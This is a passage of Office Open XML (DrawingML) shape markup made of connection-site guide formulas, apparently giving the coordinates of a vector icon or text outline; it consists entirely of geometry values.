                <a:gd name="connsiteX37" fmla="*/ 205637 w 341498"/>
                <a:gd name="connsiteY37" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX38" fmla="*/ 229517 w 341498"/>
                <a:gd name="connsiteY38" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX39" fmla="*/ 229517 w 341498"/>
                <a:gd name="connsiteY39" fmla="*/ 329803 h 434997"/>
                <a:gd name="connsiteX40" fmla="*/ 211454 w 341498"/>
                <a:gd name="connsiteY40" fmla="*/ 329803 h 434997"/>
                <a:gd name="connsiteX41" fmla="*/ 211454 w 341498"/>
                <a:gd name="connsiteY41" fmla="*/ 338516 h 434997"/>
                <a:gd name="connsiteX42" fmla="*/ 228179 w 341498"/>
                <a:gd name="connsiteY42" fmla="*/ 338516 h 434997"/>
                <a:gd name="connsiteX43" fmla="*/ 228179 w 341498"/>
                <a:gd name="connsiteY43" fmla="*/ 343237 h 434997"/>
                <a:gd name="connsiteX44" fmla="*/ 211454 w 341498"/>
                <a:gd name="connsiteY44" fmla="*/ 343237 h 434997"/>
                <a:gd name="connsiteX45" fmla="*/ 211454 w 341498"/>
                <a:gd name="connsiteY45" fmla="*/ 352970 h 434997"/>
                <a:gd name="connsiteX46" fmla="*/ 229837 w 341498"/>
                <a:gd name="connsiteY46" fmla="*/ 352970 h 434997"/>
                <a:gd name="connsiteX47" fmla="*/ 229837 w 341498"/>
                <a:gd name="connsiteY47" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX48" fmla="*/ 205637 w 341498"/>
                <a:gd name="connsiteY48" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX49" fmla="*/ 171869 w 341498"/>
                <a:gd name="connsiteY49" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX50" fmla="*/ 178006 w 341498"/>
                <a:gd name="connsiteY50" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX51" fmla="*/ 193131 w 341498"/>
                <a:gd name="connsiteY51" fmla="*/ 349269 h 434997"/>
                <a:gd name="connsiteX52" fmla="*/ 193218 w 341498"/>
                <a:gd name="connsiteY52" fmla="*/ 349269 h 434997"/>
                <a:gd name="connsiteX53" fmla="*/ 193218 w 341498"/>
                <a:gd name="connsiteY53" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX54" fmla="*/ 198744 w 341498"/>
                <a:gd name="connsiteY54" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX55" fmla="*/ 198744 w 341498"/>
                <a:gd name="connsiteY55" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX56" fmla="*/ 192636 w 341498"/>
                <a:gd name="connsiteY56" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX57" fmla="*/ 177512 w 341498"/>
                <a:gd name="connsiteY57" fmla="*/ 333562 h 434997"/>
                <a:gd name="connsiteX58" fmla="*/ 177395 w 341498"/>
                <a:gd name="connsiteY58" fmla="*/ 333562 h 434997"/>
                <a:gd name="connsiteX59" fmla="*/ 177395 w 341498"/>
                <a:gd name="connsiteY59" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX60" fmla="*/ 171869 w 341498"/>
                <a:gd name="connsiteY60" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX61" fmla="*/ 138304 w 341498"/>
                <a:gd name="connsiteY61" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX62" fmla="*/ 144441 w 341498"/>
                <a:gd name="connsiteY62" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX63" fmla="*/ 159595 w 341498"/>
                <a:gd name="connsiteY63" fmla="*/ 349269 h 434997"/>
                <a:gd name="connsiteX64" fmla="*/ 159682 w 341498"/>
                <a:gd name="connsiteY64" fmla="*/ 349269 h 434997"/>
                <a:gd name="connsiteX65" fmla="*/ 159682 w 341498"/>
                <a:gd name="connsiteY65" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX66" fmla="*/ 165208 w 341498"/>
                <a:gd name="connsiteY66" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX67" fmla="*/ 165208 w 341498"/>
                <a:gd name="connsiteY67" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX68" fmla="*/ 159071 w 341498"/>
                <a:gd name="connsiteY68" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX69" fmla="*/ 143976 w 341498"/>
                <a:gd name="connsiteY69" fmla="*/ 333562 h 434997"/>
                <a:gd name="connsiteX70" fmla="*/ 143830 w 341498"/>
                <a:gd name="connsiteY70" fmla="*/ 333562 h 434997"/>
                <a:gd name="connsiteX71" fmla="*/ 143830 w 341498"/>
                <a:gd name="connsiteY71" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX72" fmla="*/ 138304 w 341498"/>
                <a:gd name="connsiteY72" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX73" fmla="*/ 125622 w 341498"/>
                <a:gd name="connsiteY73" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX74" fmla="*/ 131439 w 341498"/>
                <a:gd name="connsiteY74" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX75" fmla="*/ 131439 w 341498"/>
                <a:gd name="connsiteY75" fmla="*/ 357982 h 434997"/>
                <a:gd name="connsiteX76" fmla="*/ 125622 w 341498"/>
                <a:gd name="connsiteY76" fmla="*/ 357982 h 434997"/>
                <a:gd name="connsiteX77" fmla="*/ 78532 w 341498"/>
                <a:gd name="connsiteY77" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX78" fmla="*/ 84407 w 341498"/>
                <a:gd name="connsiteY78" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX79" fmla="*/ 90399 w 341498"/>
                <a:gd name="connsiteY79" fmla="*/ 350172 h 434997"/>
                <a:gd name="connsiteX80" fmla="*/ 90515 w 341498"/>
                <a:gd name="connsiteY80" fmla="*/ 350172 h 434997"/>
                <a:gd name="connsiteX81" fmla="*/ 97205 w 341498"/>
                <a:gd name="connsiteY81" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX82" fmla="*/ 103139 w 341498"/>
                <a:gd name="connsiteY82" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX83" fmla="*/ 109654 w 341498"/>
                <a:gd name="connsiteY83" fmla="*/ 350172 h 434997"/>
                <a:gd name="connsiteX84" fmla="*/ 109741 w 341498"/>
                <a:gd name="connsiteY84" fmla="*/ 350172 h 434997"/>
                <a:gd name="connsiteX85" fmla="*/ 115907 w 341498"/>
                <a:gd name="connsiteY85" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX86" fmla="*/ 121812 w 341498"/>
                <a:gd name="connsiteY86" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX87" fmla="*/ 112650 w 341498"/>
                <a:gd name="connsiteY87" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX88" fmla="*/ 106774 w 341498"/>
                <a:gd name="connsiteY88" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX89" fmla="*/ 100114 w 341498"/>
                <a:gd name="connsiteY89" fmla="*/ 332601 h 434997"/>
                <a:gd name="connsiteX90" fmla="*/ 100026 w 341498"/>
                <a:gd name="connsiteY90" fmla="*/ 332601 h 434997"/>
                <a:gd name="connsiteX91" fmla="*/ 93250 w 341498"/>
                <a:gd name="connsiteY91" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX92" fmla="*/ 87258 w 341498"/>
                <a:gd name="connsiteY92" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX93" fmla="*/ 3345 w 341498"/>
                <a:gd name="connsiteY93" fmla="*/ 300139 h 434997"/>
                <a:gd name="connsiteX94" fmla="*/ 3345 w 341498"/>
                <a:gd name="connsiteY94" fmla="*/ 384440 h 434997"/>
                <a:gd name="connsiteX95" fmla="*/ 338153 w 341498"/>
                <a:gd name="connsiteY95" fmla="*/ 384440 h 434997"/>
                <a:gd name="connsiteX96" fmla="*/ 338153 w 341498"/>
                <a:gd name="connsiteY96" fmla="*/ 300139 h 434997"/>
                <a:gd name="connsiteX97" fmla="*/ 157355 w 341498"/>
                <a:gd name="connsiteY97" fmla="*/ 235158 h 434997"/>
                <a:gd name="connsiteX98" fmla="*/ 157500 w 341498"/>
                <a:gd name="connsiteY98" fmla="*/ 235158 h 434997"/>
                <a:gd name="connsiteX99" fmla="*/ 162678 w 341498"/>
                <a:gd name="connsiteY99" fmla="*/ 252992 h 434997"/>
                <a:gd name="connsiteX100" fmla="*/ 152119 w 341498"/>
                <a:gd name="connsiteY100" fmla="*/ 252992 h 434997"/>
                <a:gd name="connsiteX101" fmla="*/ 81703 w 341498"/>
                <a:gd name="connsiteY101" fmla="*/ 235158 h 434997"/>
                <a:gd name="connsiteX102" fmla="*/ 81848 w 341498"/>
                <a:gd name="connsiteY102" fmla="*/ 235158 h 434997"/>
                <a:gd name="connsiteX103" fmla="*/ 87026 w 341498"/>
                <a:gd name="connsiteY103" fmla="*/ 252992 h 434997"/>
                <a:gd name="connsiteX104" fmla="*/ 76467 w 341498"/>
                <a:gd name="connsiteY104" fmla="*/ 252992 h 434997"/>
                <a:gd name="connsiteX105" fmla="*/ 217533 w 341498"/>
                <a:gd name="connsiteY105" fmla="*/ 233963 h 434997"/>
                <a:gd name="connsiteX106" fmla="*/ 223350 w 341498"/>
                <a:gd name="connsiteY106" fmla="*/ 233963 h 434997"/>
                <a:gd name="connsiteX107" fmla="*/ 234985 w 341498"/>
                <a:gd name="connsiteY107" fmla="*/ 248737 h 434997"/>
                <a:gd name="connsiteX108" fmla="*/ 223350 w 341498"/>
                <a:gd name="connsiteY108" fmla="*/ 263540 h 434997"/>
                <a:gd name="connsiteX109" fmla="*/ 217533 w 341498"/>
                <a:gd name="connsiteY109" fmla="*/ 263540 h 434997"/>
                <a:gd name="connsiteX110" fmla="*/ 183241 w 341498"/>
                <a:gd name="connsiteY110" fmla="*/ 233963 h 434997"/>
                <a:gd name="connsiteX111" fmla="*/ 193014 w 341498"/>
                <a:gd name="connsiteY111" fmla="*/ 233963 h 434997"/>
                <a:gd name="connsiteX112" fmla="*/ 199006 w 341498"/>
                <a:gd name="connsiteY112" fmla="*/ 240287 h 434997"/>
                <a:gd name="connsiteX113" fmla="*/ 193189 w 341498"/>
                <a:gd name="connsiteY113" fmla="*/ 246901 h 434997"/>
                <a:gd name="connsiteX114" fmla="*/ 183241 w 341498"/>
                <a:gd name="connsiteY114" fmla="*/ 246901 h 434997"/>
                <a:gd name="connsiteX115" fmla="*/ 211426 w 341498"/>
                <a:gd name="connsiteY115" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX116" fmla="*/ 211426 w 341498"/>
                <a:gd name="connsiteY116" fmla="*/ 269542 h 434997"/>
                <a:gd name="connsiteX117" fmla="*/ 225910 w 341498"/>
                <a:gd name="connsiteY117" fmla="*/ 269542 h 434997"/>
                <a:gd name="connsiteX118" fmla="*/ 241180 w 341498"/>
                <a:gd name="connsiteY118" fmla="*/ 248824 h 434997"/>
                <a:gd name="connsiteX119" fmla="*/ 225910 w 341498"/>
                <a:gd name="connsiteY119" fmla="*/ 228106 h 434997"/>
                <a:gd name="connsiteX120" fmla="*/ 177424 w 341498"/>
                <a:gd name="connsiteY120" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX121" fmla="*/ 177424 w 341498"/>
                <a:gd name="connsiteY121" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX122" fmla="*/ 183241 w 341498"/>
                <a:gd name="connsiteY122" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX123" fmla="*/ 183241 w 341498"/>
                <a:gd name="connsiteY123" fmla="*/ 252408 h 434997"/>
                <a:gd name="connsiteX124" fmla="*/ 192287 w 341498"/>
                <a:gd name="connsiteY124" fmla="*/ 252408 h 434997"/>
                <a:gd name="connsiteX125" fmla="*/ 199180 w 341498"/>
                <a:gd name="connsiteY125" fmla="*/ 263365 h 434997"/>
                <a:gd name="connsiteX126" fmla="*/ 200082 w 341498"/>
                <a:gd name="connsiteY126" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX127" fmla="*/ 206510 w 341498"/>
                <a:gd name="connsiteY127" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX128" fmla="*/ 204881 w 341498"/>
                <a:gd name="connsiteY128" fmla="*/ 258499 h 434997"/>
                <a:gd name="connsiteX129" fmla="*/ 199733 w 341498"/>
                <a:gd name="connsiteY129" fmla="*/ 249757 h 434997"/>
                <a:gd name="connsiteX130" fmla="*/ 205550 w 341498"/>
                <a:gd name="connsiteY130" fmla="*/ 239325 h 434997"/>
                <a:gd name="connsiteX131" fmla="*/ 205288 w 341498"/>
                <a:gd name="connsiteY131" fmla="*/ 239237 h 434997"/>
                <a:gd name="connsiteX132" fmla="*/ 193945 w 341498"/>
                <a:gd name="connsiteY132" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX133" fmla="*/ 154155 w 341498"/>
                <a:gd name="connsiteY133" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX134" fmla="*/ 140979 w 341498"/>
                <a:gd name="connsiteY134" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX135" fmla="*/ 147204 w 341498"/>
                <a:gd name="connsiteY135" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX136" fmla="*/ 150461 w 341498"/>
                <a:gd name="connsiteY136" fmla="*/ 258499 h 434997"/>
                <a:gd name="connsiteX137" fmla="*/ 164277 w 341498"/>
                <a:gd name="connsiteY137" fmla="*/ 258499 h 434997"/>
                <a:gd name="connsiteX138" fmla="*/ 167535 w 341498"/>
                <a:gd name="connsiteY138" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX139" fmla="*/ 173934 w 341498"/>
                <a:gd name="connsiteY139" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX140" fmla="*/ 160612 w 341498"/>
                <a:gd name="connsiteY140" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX141" fmla="*/ 97060 w 341498"/>
                <a:gd name="connsiteY141" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX142" fmla="*/ 106164 w 341498"/>
                <a:gd name="connsiteY142" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX143" fmla="*/ 112417 w 341498"/>
                <a:gd name="connsiteY143" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX144" fmla="*/ 119601 w 341498"/>
                <a:gd name="connsiteY144" fmla="*/ 237780 h 434997"/>
                <a:gd name="connsiteX145" fmla="*/ 126524 w 341498"/>
                <a:gd name="connsiteY145" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX146" fmla="*/ 132690 w 341498"/>
                <a:gd name="connsiteY146" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX147" fmla="*/ 142230 w 341498"/>
                <a:gd name="connsiteY147" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX148" fmla="*/ 135860 w 341498"/>
                <a:gd name="connsiteY148" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX149" fmla="*/ 129432 w 341498"/>
                <a:gd name="connsiteY149" fmla="*/ 259723 h 434997"/>
                <a:gd name="connsiteX150" fmla="*/ 122655 w 341498"/>
                <a:gd name="connsiteY150" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX151" fmla="*/ 116460 w 341498"/>
                <a:gd name="connsiteY151" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX152" fmla="*/ 109479 w 341498"/>
                <a:gd name="connsiteY152" fmla="*/ 259723 h 434997"/>
                <a:gd name="connsiteX153" fmla="*/ 103226 w 341498"/>
                <a:gd name="connsiteY153" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX154" fmla="*/ 78532 w 341498"/>
                <a:gd name="connsiteY154" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX155" fmla="*/ 65327 w 341498"/>
                <a:gd name="connsiteY155" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX156" fmla="*/ 71580 w 341498"/>
                <a:gd name="connsiteY156" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX157" fmla="*/ 74809 w 341498"/>
                <a:gd name="connsiteY157" fmla="*/ 258499 h 434997"/>
                <a:gd name="connsiteX158" fmla="*/ 88625 w 341498"/>
                <a:gd name="connsiteY158" fmla="*/ 258499 h 434997"/>
                <a:gd name="connsiteX159" fmla="*/ 91882 w 341498"/>
                <a:gd name="connsiteY159" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX160" fmla="*/ 98368 w 341498"/>
                <a:gd name="connsiteY160" fmla="*/ 269455 h 434997"/>
                <a:gd name="connsiteX161" fmla="*/ 84989 w 341498"/>
                <a:gd name="connsiteY161" fmla="*/ 228018 h 434997"/>
                <a:gd name="connsiteX162" fmla="*/ 257264 w 341498"/>
                <a:gd name="connsiteY162" fmla="*/ 227001 h 434997"/>
                <a:gd name="connsiteX163" fmla="*/ 245601 w 341498"/>
                <a:gd name="connsiteY163" fmla="*/ 239091 h 434997"/>
                <a:gd name="connsiteX164" fmla="*/ 253251 w 341498"/>
                <a:gd name="connsiteY164" fmla="*/ 249582 h 434997"/>
                <a:gd name="connsiteX165" fmla="*/ 263576 w 341498"/>
                <a:gd name="connsiteY165" fmla="*/ 253020 h 434997"/>
                <a:gd name="connsiteX166" fmla="*/ 266485 w 341498"/>
                <a:gd name="connsiteY166" fmla="*/ 258120 h 434997"/>
                <a:gd name="connsiteX167" fmla="*/ 259155 w 341498"/>
                <a:gd name="connsiteY167" fmla="*/ 264385 h 434997"/>
                <a:gd name="connsiteX168" fmla="*/ 257628 w 341498"/>
                <a:gd name="connsiteY168" fmla="*/ 264385 h 434997"/>
                <a:gd name="connsiteX169" fmla="*/ 250430 w 341498"/>
                <a:gd name="connsiteY169" fmla="*/ 255643 h 434997"/>
                <a:gd name="connsiteX170" fmla="*/ 244380 w 341498"/>
                <a:gd name="connsiteY170" fmla="*/ 255643 h 434997"/>
                <a:gd name="connsiteX171" fmla="*/ 258923 w 341498"/>
                <a:gd name="connsiteY171" fmla="*/ 270446 h 434997"/>
                <a:gd name="connsiteX172" fmla="*/ 272680 w 341498"/>
                <a:gd name="connsiteY172" fmla="*/ 257450 h 434997"/>
                <a:gd name="connsiteX173" fmla="*/ 265962 w 341498"/>
                <a:gd name="connsiteY173" fmla="*/ 246901 h 434997"/>
                <a:gd name="connsiteX174" fmla="*/ 255956 w 341498"/>
                <a:gd name="connsiteY174" fmla="*/ 243696 h 434997"/>
                <a:gd name="connsiteX175" fmla="*/ 251709 w 341498"/>
                <a:gd name="connsiteY175" fmla="*/ 238509 h 434997"/>
                <a:gd name="connsiteX176" fmla="*/ 258050 w 341498"/>
                <a:gd name="connsiteY176" fmla="*/ 233118 h 434997"/>
                <a:gd name="connsiteX177" fmla="*/ 259176 w 341498"/>
                <a:gd name="connsiteY177" fmla="*/ 233093 h 434997"/>
                <a:gd name="connsiteX178" fmla="*/ 265525 w 341498"/>
                <a:gd name="connsiteY178" fmla="*/ 240286 h 434997"/>
                <a:gd name="connsiteX179" fmla="*/ 271575 w 341498"/>
                <a:gd name="connsiteY179" fmla="*/ 240286 h 434997"/>
                <a:gd name="connsiteX180" fmla="*/ 271572 w 341498"/>
                <a:gd name="connsiteY180" fmla="*/ 238784 h 434997"/>
                <a:gd name="connsiteX181" fmla="*/ 258283 w 341498"/>
                <a:gd name="connsiteY181" fmla="*/ 227028 h 434997"/>
                <a:gd name="connsiteX182" fmla="*/ 257264 w 341498"/>
                <a:gd name="connsiteY182" fmla="*/ 227001 h 434997"/>
                <a:gd name="connsiteX183" fmla="*/ 287165 w 341498"/>
                <a:gd name="connsiteY183" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX184" fmla="*/ 287165 w 341498"/>
                <a:gd name="connsiteY184" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX185" fmla="*/ 310085 w 341498"/>
                <a:gd name="connsiteY185" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX186" fmla="*/ 310085 w 341498"/>
                <a:gd name="connsiteY186" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX187" fmla="*/ 292633 w 341498"/>
                <a:gd name="connsiteY187" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX188" fmla="*/ 292633 w 341498"/>
                <a:gd name="connsiteY188" fmla="*/ 201967 h 434997"/>
                <a:gd name="connsiteX189" fmla="*/ 308369 w 341498"/>
                <a:gd name="connsiteY189" fmla="*/ 201967 h 434997"/>
                <a:gd name="connsiteX190" fmla="*/ 308369 w 341498"/>
                <a:gd name="connsiteY190" fmla="*/ 196606 h 434997"/>
                <a:gd name="connsiteX191" fmla="*/ 292633 w 341498"/>
                <a:gd name="connsiteY191" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX192" fmla="*/ 292633 w 341498"/>
                <a:gd name="connsiteY192" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX193" fmla="*/ 309619 w 341498"/>
                <a:gd name="connsiteY193" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX194" fmla="*/ 309619 w 341498"/>
                <a:gd name="connsiteY194" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX195" fmla="*/ 223961 w 341498"/>
                <a:gd name="connsiteY195" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX196" fmla="*/ 223961 w 341498"/>
                <a:gd name="connsiteY196" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX197" fmla="*/ 229197 w 341498"/>
                <a:gd name="connsiteY197" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX198" fmla="*/ 229197 w 341498"/>
                <a:gd name="connsiteY198" fmla="*/ 190982 h 434997"/>
                <a:gd name="connsiteX199" fmla="*/ 243362 w 341498"/>
                <a:gd name="connsiteY199" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX200" fmla="*/ 249179 w 341498"/>
                <a:gd name="connsiteY200" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX201" fmla="*/ 249237 w 341498"/>
                <a:gd name="connsiteY201" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX202" fmla="*/ 244031 w 341498"/>
                <a:gd name="connsiteY202" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX203" fmla="*/ 244031 w 341498"/>
                <a:gd name="connsiteY203" fmla="*/ 208611 h 434997"/>
                <a:gd name="connsiteX204" fmla="*/ 229779 w 341498"/>
                <a:gd name="connsiteY204" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX205" fmla="*/ 196592 w 341498"/>
                <a:gd name="connsiteY205" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX206" fmla="*/ 196592 w 341498"/>
                <a:gd name="connsiteY206" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX207" fmla="*/ 219482 w 341498"/>
                <a:gd name="connsiteY207" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX208" fmla="*/ 219482 w 341498"/>
                <a:gd name="connsiteY208" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX209" fmla="*/ 202031 w 341498"/>
                <a:gd name="connsiteY209" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX210" fmla="*/ 202031 w 341498"/>
                <a:gd name="connsiteY210" fmla="*/ 201793 h 434997"/>
                <a:gd name="connsiteX211" fmla="*/ 217766 w 341498"/>
                <a:gd name="connsiteY211" fmla="*/ 201793 h 434997"/>
                <a:gd name="connsiteX212" fmla="*/ 217766 w 341498"/>
                <a:gd name="connsiteY212" fmla="*/ 196431 h 434997"/>
                <a:gd name="connsiteX213" fmla="*/ 202031 w 341498"/>
                <a:gd name="connsiteY213" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX214" fmla="*/ 202031 w 341498"/>
                <a:gd name="connsiteY214" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX215" fmla="*/ 219017 w 341498"/>
                <a:gd name="connsiteY215" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX216" fmla="*/ 219017 w 341498"/>
                <a:gd name="connsiteY216" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX217" fmla="*/ 171607 w 341498"/>
                <a:gd name="connsiteY217" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX218" fmla="*/ 171607 w 341498"/>
                <a:gd name="connsiteY218" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX219" fmla="*/ 192811 w 341498"/>
                <a:gd name="connsiteY219" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX220" fmla="*/ 192811 w 341498"/>
                <a:gd name="connsiteY220" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX221" fmla="*/ 177046 w 341498"/>
                <a:gd name="connsiteY221" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX222" fmla="*/ 177046 w 341498"/>
                <a:gd name="connsiteY222" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX223" fmla="*/ 146448 w 341498"/>
                <a:gd name="connsiteY223" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX224" fmla="*/ 146448 w 341498"/>
                <a:gd name="connsiteY224" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX225" fmla="*/ 167738 w 341498"/>
                <a:gd name="connsiteY225" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX226" fmla="*/ 167738 w 341498"/>
                <a:gd name="connsiteY226" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX227" fmla="*/ 151887 w 341498"/>
                <a:gd name="connsiteY227" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX228" fmla="*/ 151887 w 341498"/>
                <a:gd name="connsiteY228" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX229" fmla="*/ 118903 w 341498"/>
                <a:gd name="connsiteY229" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX230" fmla="*/ 118903 w 341498"/>
                <a:gd name="connsiteY230" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX231" fmla="*/ 141823 w 341498"/>
                <a:gd name="connsiteY231" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX232" fmla="*/ 141823 w 341498"/>
                <a:gd name="connsiteY232" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX233" fmla="*/ 124371 w 341498"/>
                <a:gd name="connsiteY233" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX234" fmla="*/ 124371 w 341498"/>
                <a:gd name="connsiteY234" fmla="*/ 201880 h 434997"/>
                <a:gd name="connsiteX235" fmla="*/ 140107 w 341498"/>
                <a:gd name="connsiteY235" fmla="*/ 201880 h 434997"/>
                <a:gd name="connsiteX236" fmla="*/ 140107 w 341498"/>
                <a:gd name="connsiteY236" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX237" fmla="*/ 124371 w 341498"/>
                <a:gd name="connsiteY237" fmla="*/ 196518 h 434997"/>
                <a:gd name="connsiteX238" fmla="*/ 124371 w 341498"/>
                <a:gd name="connsiteY238" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX239" fmla="*/ 141357 w 341498"/>
                <a:gd name="connsiteY239" fmla="*/ 186756 h 434997"/>
                <a:gd name="connsiteX240" fmla="*/ 141357 w 341498"/>
                <a:gd name="connsiteY240" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX241" fmla="*/ 56369 w 341498"/>
                <a:gd name="connsiteY241" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX242" fmla="*/ 66665 w 341498"/>
                <a:gd name="connsiteY242" fmla="*/ 199170 h 434997"/>
                <a:gd name="connsiteX243" fmla="*/ 55612 w 341498"/>
                <a:gd name="connsiteY243" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX244" fmla="*/ 61866 w 341498"/>
                <a:gd name="connsiteY244" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX245" fmla="*/ 69806 w 341498"/>
                <a:gd name="connsiteY245" fmla="*/ 204182 h 434997"/>
                <a:gd name="connsiteX246" fmla="*/ 77543 w 341498"/>
                <a:gd name="connsiteY246" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX247" fmla="*/ 84175 w 341498"/>
                <a:gd name="connsiteY247" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX248" fmla="*/ 73151 w 341498"/>
                <a:gd name="connsiteY248" fmla="*/ 199083 h 434997"/>
                <a:gd name="connsiteX249" fmla="*/ 83448 w 341498"/>
                <a:gd name="connsiteY249" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX250" fmla="*/ 77339 w 341498"/>
                <a:gd name="connsiteY250" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX251" fmla="*/ 69951 w 341498"/>
                <a:gd name="connsiteY251" fmla="*/ 194275 h 434997"/>
                <a:gd name="connsiteX252" fmla="*/ 62884 w 341498"/>
                <a:gd name="connsiteY252" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX253" fmla="*/ 31558 w 341498"/>
                <a:gd name="connsiteY253" fmla="*/ 181103 h 434997"/>
                <a:gd name="connsiteX254" fmla="*/ 31558 w 341498"/>
                <a:gd name="connsiteY254" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX255" fmla="*/ 54303 w 341498"/>
                <a:gd name="connsiteY255" fmla="*/ 218548 h 434997"/>
                <a:gd name="connsiteX256" fmla="*/ 54303 w 341498"/>
                <a:gd name="connsiteY256" fmla="*/ 212720 h 434997"/>
                <a:gd name="connsiteX257" fmla="*/ 37026 w 341498"/>
